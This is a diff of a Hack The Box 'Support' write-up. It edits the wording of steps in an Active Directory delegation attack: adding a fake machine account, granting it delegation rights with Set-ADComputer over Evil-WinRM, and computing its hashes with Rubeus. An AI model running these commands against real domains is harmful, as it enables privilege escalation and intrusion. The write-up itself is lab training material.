Arcsin00/HTB-Support/HTB - Support.md

 [+] Machine account FAKE01 added
 ```

-Now use the built-in AD function to give the new computer object constrained delegation privilege.
+Now use the built-in AD function to give the fake computer object constrained delegation privilege.

 ```text-plain
 *Evil-WinRM* PS C:\Users\support\Documents> Set-ADComputer (Get-Variable -Name "targetComputer").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "FakePC").Value + '$')
 ```

-With Rubeus, generate the new fake computer object password hashes.
-Since we created the computer object with the password 123456 we will need those hashes for the next step.
+With Rubeus, generate the fake computer object password hashes.
+Since we created the computer object with the password 123456 we will need to specify that in the request.

 ```text-plain
 *Evil-WinRM* PS C:\Users\support\Documents> ./r.exe hash /password:123456 /user:FAKE01$ /domain:support.htb